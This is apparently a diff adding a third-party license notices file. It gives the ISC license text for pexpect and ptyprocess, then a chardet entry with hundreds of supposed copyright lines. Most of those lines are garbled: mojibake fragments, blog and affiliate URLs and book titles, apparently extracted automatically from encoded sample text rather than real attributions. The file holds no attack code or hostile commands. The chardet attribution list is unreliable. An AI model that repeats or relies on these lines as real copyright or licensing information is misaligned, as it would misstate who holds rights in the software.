+THE SOFTWARE IS PROVIDED "AS IS" AND ISC DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+pexpect 4.8.0 - ISC
+
+
+Copyright (c) 2010 Doug Hellmann.
+copyright u'2013, Noah Spurrier and contributors
+Copyright (c) 2012, Noah Spurrier <noah@noah.org>
+Copyright (c) 2013-2014, Pexpect development team
+Copyright (c) 2013-2016, Pexpect development team
+Copyright (c) 2016, Martin Packman <martin.packman@canonical.com>
+
+ISC License
+
+Copyright (c) 2004-2010 by Internet Systems Consortium, Inc. ("ISC")
+
+Copyright (c) 1995-2003 by Internet Software Consortium
+
+Permission to use, copy, modify, and /or distribute this software for any purpose with or without fee is hereby granted, provided that the above copyright notice and this permission notice appear in all copies.
+
+THE SOFTWARE IS PROVIDED "AS IS" AND ISC DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+ptyprocess 0.7.0 - ISC
+
+
+copyright u'2014, Thomas Kluyver
+Copyright (c) 2012, Noah Spurrier <noah@noah.org>
+Copyright (c) 2013-2014, Pexpect development team
+
+ISC License
+
+Copyright (c) 2004-2010 by Internet Systems Consortium, Inc. ("ISC")
+
+Copyright (c) 1995-2003 by Internet Software Consortium
+
+Permission to use, copy, modify, and /or distribute this software for any purpose with or without fee is hereby granted, provided that the above copyright notice and this permission notice appear in all copies.
+
+THE SOFTWARE IS PROVIDED "AS IS" AND ISC DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+chardet 4.0.0 - LGPL-2.1-only
+
+
+(c) Bv
+(c) CO
+(c) BvA
+(c) coB
+(c) H U3
+(c) Hp X
+(c) I3 Y
+(c) M2 Y
+(c) O3 Y
+(c) EY Ij
+(c) OY H2
+(c), 1998
+(c) Ca U3a
+(c) CaA CO
+O-o (c) I3
+(c) C/ 1996
+(c) C/ 2006
+(c) CD Land
+(c) MY LIao
+(c) Take IT
+(c) (c) AAEE
+(c) Eac Aaef
+(c) u (c) OY
+(c) AAeAE WEd
+(c) AU Ass CN
+(c) AUueAo AI
+(c) OAAnPaE I
+(c) OY HAySSU
+(c) e" (c) SS
+(c) o, (c) MY
+(c) sY (c) OY
+(c) !eI (c) FE
+(c) L FWaIoaXs
+(c) aa" (c) PS
+(c) uAe (c) PY
+(c) uu?i 2003A
+Copyright 2005
+(c) B Pool Game
+(c) CaAU Audegi
+(c) lEEe (c) AE
+(c) w'Au AASSQY
+(c) (c) O1981|~Y
+(c) / 1965 Y AEY
+(c) AEAAIAo AaAI
+(c) nEJW (c) EHI
+(c) pAh (c) ASSU
+(c) M1960~1980|~Y
+(c) aA"AE (c) 1AE
+(c) aAua$? (c) HH
+(c) uIEC/ (c) EHI
+Ee (c) EAEvAACAEe
+(c) ,!C2001|~ao!mx
+(c) A1/2cC/ (c) EB
+(c) Ao2- AIdegPSAo
+(c) EDiETCgDi Hiro
+Copyright (c) 2005
+Copyright (c) 2006
+Copyright 2004 Mon
+Copyright 2004 Sun
+Copyright 2005 Thu
+Copyright 2005 Tue
+Copyright 2005 Wed
+Copyright 2006 Mon
+(c) *F!ASSUI (c) IY
+(c) Au IUAEnCIeAEai
+(c) uu?i 1/41o 2003
+CN1o o,? (c) AOdegi
+Copyright 2003-2006
+(c) ESSO!A (c) ESSOY
+(c) aEaIAua$? (c) EH
+(c) e+-AEaoe (c) AEB
+AdegeP dege!o (c) Ao
+(c) (r)IE bvAbvAi'u'I
+(c) AUueAI PEdegdegAo
+(c) AUueAo PEdegdegAo
+(c) EAeEEEB / CuhAIcI
+(c) http://flickr.com
+(c) o1998|~07$?eP!?iY
+Hx wCnE$?iaeU* (c) Hx
+SSea aaaae" (c) Perl.
+(c) I3 3QPAZP-'PSY Xao
+(c) aueU1nB 2006-01-02
+(c) o*R+-!!B$?H (c) EY
+(c) 2004 - 2005, Efendi
+(c) U. John Battelledeg
+(c) aueU1nEB 2006-01-03
+(c) degO!A*iuM!O (c) MY
+Copyright (c) 2004-2005
+(c) $?IIo E PEa!U1993.2.
+Copyright (c) 2006, AND0
+(c) Ao ,oCN'U Ao COdegauE
+(c) EREaC/-eAEC/$? (c) RL
+(c) uu?i 1/41o 2003A Intel
+copyright BBCHungarian.com
+(c) ,oua http://sosa0sa.com
+(c) BJoel on SoftwareICgEaA
+(c) CIAEdeg MSAC Classified
+Copyright (c) 2005 Carshops
+(c) ,SSCI'A http://kysky.com
+(c) a http://konkurs.susu.ru
+Copyright (c) 2006, Grebeweb
+(c) $?cAAAzEnPaEC/I (c) HAASS
+(c) *-deg!Ao ?PoAI degOAOA CO
+(c) lPi$?JotAAdege!A1962|~otY
+(c) Lionhard Technologies 2003
+(c) g(r)R'Nn?o$?F!I!v!A (c) OY
+(c) o a http://www.pots.com.tw
+(c) http://blog.mlmaster.com/?p
+(c) http://susu.ac.ru/gerb2.gif
+Copyright 2001, Nikolay Hristov
+Movable Type Copyright (c) 2005
+Movable Type Copyright (c) 2006
+(c) 1/4<<PE!PSEc1uPaO>>D (c) PO2
+(c) ?idegE http://klutzy.x-y.net
+(c) http://ch.kitaguni.tv/u/8280
+Copyright (c) 2005 AmbitUSA Inc.
+(c) Copyright 2005, Sharks.co.il.
+(c) o1/4!Y http://artifact-jp.com
+(c) B OEo1/2, L-IEzIaAUCUe Ch bvEm
+(c) e e!nPortnoy's Complaint!U1969
+(c) e(r)*PW1L$?@$?d|WdegN P (c) MY
+(c) a"C/Y aa"aY a http://susu.ac.ru
+(c) ,oua 1/2o+-o KM http://pm2.ww.to
+Copyright 2003-2005 A Muvelodes Haza
+(c) ,oua http://jungti1234.netcci.net
+(c) AU+-a 1/4?i?! ?APodeg! oA3/4ss CO
+(c) AUueAo AoY *I PEdegdegAo ?EA AOAo
+(c) d$?SSP!'N13!OAy2yao+-D1/2m (c) MY
+(c) cao http://www.daihung.com/blog/?p
+(c) ao A$?lI!nMidnight's Children!U1981
+Copyright 2005 url http://wordpress.org
+(c) R1B!n!@The Nature and Destiny of Man
+Copyright 2005 Dow Jones & Company, Inc.
+Copyright (c) 1998 the Initial Developer.
+Copyright (c) 2001 the Initial Developer.
+Copyright (c) 2005 the Initial Developer.
+(c) cuAAA / http://px.a8.net/svt/ejp?a8mat
+(c) eEue1/2 http://px.a8.net/svt/ejp?a8mat
+(c) ae ol li a http://www.tipilp.susu.ac.ru
+Copyright (c) 2006 Herczeg Jozsef Tamas Wed
+copyrighted by the Free Software Foundation
+(c) 1/21... REBOOTED http://andore.com/money
+(c) C*P"Y !C http://willythecop.blogspot.com
+(c) http://kapranoff.ru/archives/003650.html
+(c) oW3Ooo' W3Ooo http://www.coolloud.org.tw
+Copyright 2003, Greenline, Kazan, Russia Wed
+(c) !E http://blog.livedoor.jp/facilitators/'
+(c) "aae http://money.rin.ru/content/news/?id
+(c) B http://sasuga.biz/pages/index.php?refid
+(c) http://azoz.org/archives/200512031633.php
+(c) (c) AA+-C/IAtBGCg http://www.1affliate.com
+(c) +-,degO AIu?Ca http://deholexp.mizc.com/wp
+(c) EEEEBU1/2V1/2ENEu-1/2u"~XgvAaie$? (c) EAEB
+(c) !PS ODE$?uAECPS!Google 1OuODgooglesucks.com
+(c) 3/4ss CN'U... http://kina.egloos.com/655614
+(c) C/AE'PeBOExI http://px.a8.net/svt/ejp?a8mat
+(c) CaA AE'A, *13/4ioIA degCA(r)?A degI ?U?! CO
+(c) cIpibx http://www.mag2.com/m/0000103697.htm
+(c) http://www.acnnewswire.net/Article.Asp?lang
+(c) ua CCAU cA* http://xenix.egloos.com/1213811
+(c) *C/AEd http://cosoft.org.cn/projects/webpm/'
+(c) 1/2A'U http://chisato.info/blog/index.php?pl
+(c) AO,c u?E3 ?eA ue*AAO degIAI'U. +-x*A3/4ss CO
+(c) cC$?1/4 SRC http://inkase.net/if/docomo.html
+(c) cC$?1/4o http://www.motionlink.jp/clk.php?pt
+(c) http://andore.com/money/archives/003398.html
+(c) jao C!K!nThe Prime of Miss Jean Brodie!U1961
+(c) o-d$?F$?@|~|haoao3/4v*P"i D+-'11/2*D!A (c) OY
+Copyright (c) 2005, CigarMinds Kft. 2006. 01. 04.
+Copyright 2005 rdf:resource http://blog.empas.com
+(c) A$?AE+-eEnA*aAu http://px.a8.net/svt/ejp?a8mat
+(c) O| http://www.acnnewswire.net/Article.Asp?lang
+(c) *-deg!Ao http://jowchung.oolim.net/index.php?pl
+(c) Oa,o*thInuAIoO3/4EC http://www.messagecast.net'
+(c) a(r)$?Y aa http://money.rin.ru/content/news/?id
+(c) http://nanana.moo.jp/archives/000922.html Y ThY
+(c) u1AoCI degIAI AIdegPSAC ,A*AI+-auu CO degIAI'U.
+(c) a http://www.greek.ru/ru/news/news_detail.php?ID
+(c) cC$?1/4I http://sasuga.biz/pages/index.php?refid
+(c) http://www.newsru.com/crime/03jan2006/minsk.html
+(c) a? http://andore.com/inami/mtarchives/003381.html
+(c) eaOOc, a"o"O http://money.rin.ru/content/news/?id
+(c) u2oAuIa http://club.h14m.org/kenji/diary/?200512b
+(c) ITOIA*B / aAIeeEI http://www.wimp.com/rubberjohnny
+(c) http://www.newsru.com/crime/03jan2006/germanz.html
+(c) aIuOOINat<<U*B /> http://webryblog.biglobe.ne.jp/'>
+Copyright (c) 1991, 1999 Free Software Foundation, Inc.
+(c) $?AE http://mimizun.com:81/blog/archives/000314.html
+(c) I"OAFaith3n / http://www.finechixxx.com/galleries/61
+(c) c http://www.topre.co.jp/products/comp/key_list.html
+(c) deg! i3/4u3/4i?? http://zangsalang.egloos.com/594634
+(c) e"|O"eOO" OconAE DiOO" *o| O*" http://music.peeps.ru
+(c) |uA1/2IAd*uaC/eBgp^CI http://px.a8.net/svt/ejp?a8mat
+(c) A |ae http://www.ebao.us/portal/showcontent.asp?INDEX
+(c) EIC/~UcEC/B http://andore.com/mt/archives/003192.html
+(c) cC$?1/4@ < /> http://www.accesstrade.net/at/c.html?rk
+(c) e http://webryblog.biglobe.ne.jp/2/d/2d5396c6b9.html'
+(c) e http://webryblog.biglobe.ne.jp/7/5/75575704c2.html'
+(c) oSS http://music.peeps.ru/news/s/2003/03/12/1366.html
+copyright 2015, Mark Pilgrim, Dan Blanchard, Ian Cordasco
+(c) +-a CNAth ASSAO'I'U. http://epitaph.egloos.com/1106816
+(c) $?A3/4a$?2$?e http://club.h14m.org/kenji/diary/?200512b
+(c) A1/2 $?A*B / http://www.monsterhunter.us/beastof7chutes
+(c) c http://itpro.nikkeibp.co.jp/free/NT/NEWS/20050225/1/'
+(c) !x!O http://www.aozora.gr.jp/cards/000050/card1174.html'
+(c) AEnT~I..... http://andore.com/money/archives/003302.html
+(c) a !- "" http://www.newsru.com/russia/03jan2006/gruz.html
+(c) ae O!o!SS http://www.greek.ru/ru/news/news_detail.php?ID
+(c) http://www.bphrs.net/mesi/archives/2005/04/post_110.html
+(c) http://www.bphrs.net/mesi/archives/2005/07/post_116.html
+(c) uu?i XP*I AE/,aCO http://jowchung.oolim.net/index.php?pl
+(c) |AAGC/aeFaith3n / http://www.finechixxx.com/galleries/65
+(c) N3/4-CAZNV GvdaIuAeAC/e http://ore-1gpy.cocolog-nifty.com
+(c) a http://www.amefoot.net/archives/2005/05/13_000876.html'
+(c) eAEAu http://fudemame-guide.com/fude15/faq/fmF15106.html'
+(c) http://www.pinkupa.com/cgi-bin/weblog/archives/000611.php
+(c) http://www.pinkupa.com/cgi-bin/weblog/archives/000616.php
+(c) +-,AC 3/4o+-1/4AIdeg!? http://zangsalang.egloos.com/592609
+(c) ,(r)1/2oA A-'O http://www.acnnewswire.net/Article.Asp?lang
+(c) cC$?1/4@ < /> http://click.linksynergy.com/fs-bin/click?id
+(c) eAC/U*B / http://www.businessnetwork.co.jp/HTM/choki.html'
+(c) http://contents-factory.com/blog/archives/200511301334.php
+(c) http://furusatonoeki.cutegirl.jp/main/archives/001172.html
+(c) l+-u"u3o|W http://www.ebao.us/portal/showcontent.asp?INDEX
+(c) uAc 05/12/26@ http://blog.inkase.net/2005/12/html_404.html
+(c) "aae " (r)aY aa(r)C/ea http://money.rin.ru/content/news/?id
+(c) 13/4!O http://www.aozora.gr.jp/cards/000275/card45513.html'
+(c) 13/4!O http://www.aozora.gr.jp/cards/000275/card45514.html'
+(c) AAw http://affiliate-school.com/products/letter.html target
+(c) albgAaeEEA1/2eauAecuC/Bu+-$?IEl3na!RAaiAAenPaEC/I (c) EEEEB
+(c) !E http://www.pinkupa.com/cgi-bin/weblog/archives/000612.php
+(c) 1OOUWikiuAIoA?PS!xOE http://ccca.nctu.edu.tw/~hlb/tavi/WiKi'
+(c) EH http://tamuyou.haun.org/mt/archives/2006/01/post_383.html
+(c) PSC/ a$?"" http://www.aviaport.ru/news/2006/01/02/99276.html
+(c) !a http://furusatonoeki.cutegirl.jp/main/archives/001177.html
+(c) E<<*1/2I>>+-",ae http://www.coverer.com/archives/000830.shtml
+(c) IA3!C*U!O|31/2i!C http://www.upsaid.com/isis/index.php?action
+(c) Lionhardt Technologies 2003, www.lionhardt.com/bb Wed, 04 Jan
+(c) O'1N!3/4N21O I?uiaCAia* http://www.opentle.org/modules.php?op
+(c) e 'a!AdegN P 'aY AP!oE1iY PTAp*u! Hong Kong People's Alliance
+(c) 1/4ONuE1/2 http://www.w3cn.org/article/translate/2005/115.html
+(c) Ac?I $?E$?I!C/ http://iriz.hanazono.ac.jp/frame/k_room_f1.html
+(c) cCAP*eAE?a3?EEeU*aeB / http://www.accesstrade.net/at/c.html?rk
+(c) (c) AA+-C/IAtBGCgxI j AaaAAEIieUu1/2B http://www.1affilaite.com
+(c) 3U!A http://furusatonoeki.cutegirl.jp/main/archives/001182.html
+(c) eU*B src http://clickablewords.com/archives/img/yomo_051020.jpg
+(c) cEEEEE http://tamuyou.haun.org/mt/archives/2005/12/post_379.html
+(c) uAA!EINuE1/2AD+-i http://www.w3cn.org/article/tips/2005/116.html
+(c) IoA3/4!E !C/ http://www.aozora.gr.jp/cards/001154/card44333.html'
+(c) M http://www.literature.org/authors/carroll-lewis/' Lewis Carroll
+(c) aueEC/a http://tamuyou.haun.org/mt/archives/2005/12/post_377.html
+(c) c2EEeU*B / https://ssl.hosting-link.ne.jp/adbyclick.asp?adurlname
+(c) http://forum.template-toolkit.ru/view_topic/topic_id-115.html?rss
+(c) deg!uE+-i? http://jely.pe.kr/archives/2004/10/20041021_000236.html
+(c) o3oY /ICASHao$?oSSta Y iY H"PS a http://www.wretch.cc/blog/iamryan
+(c) *-deg!Ao 1/4on1/2o,| AC/COo,'I title http://xenix.egloos.com/189169'
+(c) ,| c?eCO1/4o AOdegOuE'U. http://www.acnnewswire.net/Article.Asp?lang
+(c) 1Uua$?B src http://www.beginnersrack.com/mt/images/20050429_soba.jpg
+(c) C/eC/eEiTha eY1/2C/A*aAGGIEI http://nefdesfous.free.fr/sculpture.htm
+(c) cA Cga*aoeTCgEPUeIiA1/2u http://tanoshi.chance.com/reg_tanoshi.php?I
+(c) cC$?1/4@ < /> http://ck.jp.ap.valuecommerce.com/servlet/referral?sid
+(c) uA1OOUGoogleOA -uADAIC/ http://www.coverer.com/archives/000832.shtml
+(c) Ca http://blog.bd-lab.com/blog/archives/000130.html Ao3 +-Y?aAI Au3a.
+(c) Ca!ae,N Yxaae!iC, !o! O! eCa!,Oe http://money.rin.ru/content/news/?id
+(c) A1/2 http://www.cycle-yoshida.com/trek/nike/shoes/mtb/5kato3_page.htm'
+(c) PS+-PSuoD3/4-1/2/E'$?-$?E$?e http://azoz.org/archives/200511260855.php
+(c) Ai1c,|uae1/2e$?IBLOG2oAa http://artifact-jp.com/mt/archives/000472.html
+(c) O$?E2n$?A$?AE$?$?Th$?*$?? http://akaname.main.jp/mt/archives/000127.html
+Copyright 1999-2004, Slavei Karadjov slaff@linux-bg.org support@linux-bg.org
+(c) - (r)e $?" aPS$?"$?" () http://www.newsru.com/world/03jan2006/knifer.html
+(c) H@ a?enALb'Aag|U*B uri http://www.sixapart.com/movabletype/' Movable Type
+(c) u http://www.coolloud.org.tw/news/database/interface/detailstander.asp?ID
+(c) 3OCi IEo1P3AEo*- !x!O http://www.aozora.gr.jp/cards/000042/card42258.html'
+Copyright 2005, ACN Newswire corp@asiacorpnet.com tim.mckinnon@asiacorpnet.com
+(c) ,oua'O http://archmond.mizc.com/tt target blank http://archmond.mizc.com/tt
+(c) 1o,deg AI 1/2AdegPSAo A degE,(r)degUAo,, 1/2AAU,, CN'U,e 1 Ao AndegIdegO CO
+(c) Ae,A !x!C/Y EY $?Y e!O http://www.aozora.gr.jp/cards/000009/card45340.html'
+(c) C/3/4aAOoI http://www.y-moto.com/bd-1/archives/2005/12/post_267.html'target
+(c) I"IauAWi http://www.cnblog.org/blog/archives/2004_08_22_cnblog_archive.html
+(c) ID1UA1/2 http://www.cnblog.org/blog/archives/2004_08_22_cnblog_archive.html
+(c) O|p|o O3y!H /p p a http://photos1.blogger.com/blogger/2953/388/1600/all.jpg
+AAAaeIuIqlAA emIEC/A*lB IUnU1/4EaeIma1/2C/ae$?E'PU*BE'ITCgATlCEEAAeIEnA (c) EeUY
+(c) o3C/ OaoY I$?eAO1IY i"PS a http://fudesign.blogspot.com/2005/08/august-8.html
+(c) !(r)E3o$?a3/4C1/4u3o3/4E$?a3/4C1/4u!A a http://ilyagram.org/archives/1683.html
+(c) ?IPSoODEIOu1/4UOuIThO-AuAPSE1/2 http://blog.westca.com/blog_a/p_full/44725.html
+(c) o aSS1I http://www.coolloud.org.tw/news/database/interface/detailstander.asp?ID
+(c) o$?@$?e$?@$?e$?W$?E$?Q(r)EA |ae http://www.ebao.us/portal/showcontent.asp?INDEX
+(c) oC/wC/w http://www.coolloud.org.tw/news/database/interface/detailstander.asp?ID
+(c) 3 3o3/4O'U. 3/4AEAI'o1/2o?!1/4 http://www.inews24.com/php/news_view.php?g_serial
+(c) HTML-$?(r)aa!Y a http://forum.template-toolkit.ru/view_topic/topic_id-88.html?rss
+(c) c@ http://www.teizouteiki.jp/contact.html' http://www.teizouteiki.jp/contact.html
+(c) idegPS W3O1/2x3/4 2005-12-30T18:40:48+08:00 domain http://www.technorati.com/tag'
+(c) $?E x$?|$?-$?e$?$?!C/1P1/4e$?E$?aC/II$?C$?*$??!PS src http://ch.kitaguni.tv/u/8280
+(c) ,(r)1/2o,P1/2o 1/4O*I yA,EAE*A degadegu1ssCY http://critique.or.kr/tt/index.php?pl
+(c) AU+-a ?i?iCss3/4udego..'U1/2A AC o A1/4AIAa.. .... http://oroll.egloos.com/986804'
+(c) C/Y aa(r) Y a $?C/(r)Y -(r)PS"!e"a http://www.newsru.com/world/03jan2006/heli.html
+(c) degi3/4uI*PS!u<<ECe|2>>NUe$?!PS!P http://www.blogchina.com/new/display/57469.html'
+(c) *I1/4OCAAE(r)deg! http://research.microsoft.com/barc/mediapresence/MyLifeBits.aspx'
+(c) e+-AEaA U*B" http://www.monsterhunter.us/beastof7chutes/creatureOriginal-message.jpg
+(c) nPAB 3/4u(11/24)aCxgaAAeIAiC/1/2C/uIC$?1/4BBB http://orf.sfc.keio.ac.jp/index.html...
+(c) o2O'aoaA* |"Y http://www.coolloud.org.tw/news/database/interface/detailstander.asp?ID
+(c) u 1/2NY Y oY ?!1/4 http://www.ycf.nanet.co.jp/~dre/cgi-bin/diary/archives/000422.html
+(c) mp3A'IyIyPS!*C/IO!PEc1uODO Ii!* 12 'i http://cappuccinos.3322.org/wp-commentsrss2.php?p
+(c) iO http://10e.org/mt/archives/200512/280341.php http://anime.livedoor.com/theater/2.html
+(c) w+-uoTh1/4OY I!C http://www.coolloud.org.tw/news/database/interface/detailstander.asp?ID
+(c) 2uA http://10e.org/mt/archives/200512/280410.php http://10e.org/samcimg3/nekonekoneko.jpg
+(c) OeI'uO o1/2th1yEEIauAPS!Oa2AECIOEuO,IyO,IAuA!PS zh rdf:resource http://b2evolution.net/?v
+(c) iC/C/ISSvAEvAAYAC/1/2n3/4aA http://www.nisshin.com/life/cm/tvcm_mama0915.html' u't YIAfeB
+(c) ieE ssStAEC/$?+-AEAAmeC/AEctOStEsA1/2BsA1/2II http://wa2.e-golf.co.jp/gp/nh/cb/cb133.htm'
+Copyright 2006, C IAOOAIDINEEC - D. AEAIAOEAACO OEA A.A. webmaster@naftemporiki.gr Wed, 4 Jan
+(c) A IUnUi'Eu AIEuEIAuAEC/A*aeEB src http://www.beginnersrack.com/mt/images/20050811_sumi1.jpg
+(c) IAE~(r)uY ~?aAD1qPx http://www.coolloud.org.tw/news/database/interface/detailstander.asp?ID
+(c) cC$?1/4o < http://www.cycle-surf.com/?ref 11'> SRC http://inkase.net/images/traffic/cycle.gif
+(c) l2x3PS!Y$?PS"i$?deg oaouoaThu2aG!C / http://photos1.blogger.com/blogger/6894/256/1600/??????'
+(c) $?oE1/21/4"$?*$??$?$?3/4i1c$?I http://msdn.microsoft.com/workshop/author/VML/ref/appendix.asp'
+(c) $?A$?a$?A$?$?$?O OP!$?e$?*$?-$?E$?A$?AE$?$??$?E x$?$?$?Th$?1$?!$?$?$? $?!$?C$?*$?c$?|! (c) PS2Y
+(c) c@ http://www.businessnetwork.co.jp/HTM/i-4.html' http://www.businessnetwork.co.jp/HTM/i-4.html
+(c) (c) euApPbgaaCEEeU*aeEB"AEIp RaiU+-Ec vEAaA1/2C/E'C/CauAuUC/U*B / http://px.a8.net/svt/ejp?a8mat
+(c) PS CUP3O?"OssuAOOuUO 'IOUEO+-3/4IiEUE1OAATMIocuAE"Au http://www.acnnewswire.net/Article.Asp?lang
+(c) ?A$?I1/4Pedegi$?I EAI,oEaY iY $?Y o http://www.aivy.co.jp/BLOG_TEST/kobakoba/archives/003047.html
+(c) cAFeedBurnerdgA1/2RSSzMEI|AYUu1/2BSubscribe3eAeuI http://feeds.feedburner.com/BragZakatoHeadline'
+(c) uAAa*NAEoOuOE1/4th*thInAEPS!?EOOE1OAxO1/4oOoAuIaooxo http://www.coverer.com/archives/000835.shtml
+(c) ?IuAAE1/2aPS!Eu3/4I2 auA3oOaNuuA1/2aUAE!PS ?? http://www.blogbus.com/blogbus/blog/index.php?blogid
+(c) $?C/"|(r)a a(r)aa! "a-(r) iSSaY aY ?? http://forum.template-toolkit.ru/view_topic/topic_id-114.html?rss
+(c) authors@template-toolkit.ru http://forum.template-toolkit.ru/view_topic/topic_id-93.html Template Toolkit
+(c) authors@template-toolkit.ru http://forum.template-toolkit.ru/view_topic/topic_id-99.html Template Toolkit
+(c) OA1au$?yaoSSU u!nEr redete mit dem Vieh, den Vogeln und den Fischen King Solomon's Ring ^AP King Solomon's
+(c) MSSUao$?ssAEFSSe(r)g!CSanwenji !O'2$?aPdegao'P3q,U /u1/4gak(3o,I!U$?FAn1/2O)!C http://sanwenji.blogspot.com
+(c) aB!xIa$??aAAElA1/2C/E YNid*eAEC/$?IA$??I1/4eAA1/4eIFlaWUeAEC/$?!-IXOBsA1/2II http://r.gnavi.co.jp/g002234/'
+(c) cT*eAEC/$?aIAAutECIoiA3ThiAO YIgp?AuAECIouiypAO3c@OOI@$?CIoia IIUAEEeBv / i http://www.nikkei.co.jp/'target
+(c) A $?IPS3PS2oiEE$?!,o3 $?u$?i$??$?3$?E$?E$?E$?e!EdegiI/$?I http://www.aozora.gr.jp/index_pages/person157.html
+(c) e1/2J haAnAC/AA20-30amutEjIlDAEeBAEB "qIuEnAHvE|AeecuC/B|ceEC/AEhecuC/B !AXB http://www.rui.jp/ruinet.php3...
+(c) !x$?E$?$?$?A$??$?I$? <$?a$?*$?i$?E$?$?!PS /> http://www.city.kyoto.jp/somu/rekishi/fm/ishibumi/html/sa043.html
+(c) ,, 1/43/4AI(Berkman Center for Internet & Society)?!1/4 AO+-U title http://cyber.law.harvard.edu/home/home?func
+copyright rules http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/learningenglish/witn/2005/05/050527_google.shtml
+(c) OA!PEyI IA -O3/4!*dPS?AEuuAIoO*IaPSo http://mag.udn.com/mag/dc/make_rss.jsp' http://mag.udn.com/mag/dc/make_rss.jsp
+(c) I2 1,o3oAEO ,oODOaE1/4uAA'1/2OPS!3/4ssIaOUIO PIODEu!PS / / N|A1/4+-oxO1/4oODO ,o http://ccca.nctu.edu.tw/~hlb/tavi/'
+(c) OAAauAblogPS!u<<EC2C/2>>ECEuODa-AAOssP1/4P(r)uAE1 http://www.cnblog.org/blog/archives/2004_08_22_cnblog_archive.html
+(c) *I1/4OCAAE(r) cdeg! AIAoCI ?u+-1?!1/4 1/41/4 1odeg*I A 1/4O*c1/4C A|degoAUAI Bytes Technology GroupdeguAC degA*!,| AeCO
+(c) PSoOD http://wiki.planetoid.info/index.php/WikiWiki' WikiWiki IoA?oI http://wiki.planetoid.info/index.php/WikiWatchList'
+(c) R$?'Y 1/4|"Y ao1/2u$?W1/4s1/41/2!BwebTV1A,O!ANaomi Klein "a1e1DY X"a$?@<<I!C"o>>o!A$?u|~*sAIPO a http://video.google.com
+(c) cou1/2t erIYeJnBaeI Y^ae@ThIeOfW^ uAEC/AEC/$?+-AEAEA http://www.amazon.co.jp/exec/obidos/ASIN/B000B4NMUA/tamuyoudiary-22/ref
+(c) EAE$?a$?AE,'$?1/2P H http://www.coolloud.org.tw/news/database/interface/detailstander.asp?ID 108673 2005|~12$?e14$?e!ASSUI+-u"iY
+(c) l$?F2A$?GO!G"AE!M|W|rY s!m http://blog.yam.com/youandme/' "S|3|W|rao"k$?kY D"$? !n |y!O2A$?@O!G"AE!m http://pingfandegushi.blogspot.com/'
+(c) 1/2cEC/uA http://ann.269ch.jp/archives/2005/12/google_20.html' n$?cLAiDuO B http://ken2-jp.cocolog-nifty.com/kenken/2005/12/google_cb13.html'
+(c) E"IthuADAIC/PS!ECITh*"OuuADAAuuADAIC/A'O'!PSOE1/4thAD+-iuAIOU?EOO2I? http://mail.wikipedia.org/pipermail/wikien-l/2004-August/date.html' OaAi
+(c) AE!PS br a http://www.softsea.net/cat/3.htm IuI31$?3/4ss /a a http://www.softsea.net/cat/306.htm 1/2cAae1$?3/4ss /a a http://www.softsea.net/cat/30602.htm
+(c) 1/2oDDOth2OIO br a http://www.softsea.net/cat/3.htm IuI31$?3/4ss /a a http://www.softsea.net/cat/305.htm IuI31UAi /a a http://www.softsea.net/cat/30514.htm
+(c) assAAaaE AoI~AEEeUu1/2B http://www.moon-light.ne.jp/weblog/archives/2005/12/post_133.html http://www.moon-light.ne.jp/weblog/archives/2005/12/post_133.html
+(c) c AgI(r)|I135.4A242.9Au1/2B http://www.moon-light.ne.jp/weblog/archives/2006/01/2005_2.html http://www.moon-light.ne.jp/weblog/archives/2006/01/2005_2.html
+(c) PS!+-iIO3oE !PS br a http://www.softsea.net/cat/3.htm IuI31$?3/4ss /a a http://www.softsea.net/cat/303.htm IuI3OoC? /a a http://www.softsea.net/cat/30390.htm
+(c) 1n2n?Th1/2n'U$?E$?A$?$?$?AE !C/ http://www.aozora.gr.jp/cards/001166/card43728.html' ?Th1/2n'UE!3U2degIA !C/ http://www.aozora.gr.jp/cards/001166/card43729.html'
+(c) PaOOOON-APSE1/2!PS br a http://www.softsea.net/cat/3.htm IuI31$?3/4ss /a a http://www.softsea.net/cat/304.htm deg2E<<*A>>$? /a a http://www.softsea.net/cat/30407.htm
+(c) xi'ouA+-PS $?,uEuEuEuE... br a http://www.softsea.net/cat/3.htm IuI31$?3/4ss /a a http://www.softsea.net/cat/303.htm IuI3OoC? /a a http://www.softsea.net/cat/30305.htm
+(c) PaOOxa2EEi1/4thIOOEOOA!PS br a http://www.softsea.net/cat/3.htm IuI31$?3/4ss /a a http://www.softsea.net/cat/309.htm 1/4OIY DYID /a a http://www.softsea.net/cat/30912.htm
+(c) 3PS1ae1/4AEEa u2Ux/xOP- -1/2oDDIaA?uAuA3IDo br a http://www.softsea.net/cat/3.htm IuI31$?3/4ss /a a http://www.softsea.net/cat/305.htm IuI31UAi /a a http://www.softsea.net/cat/30506.htm
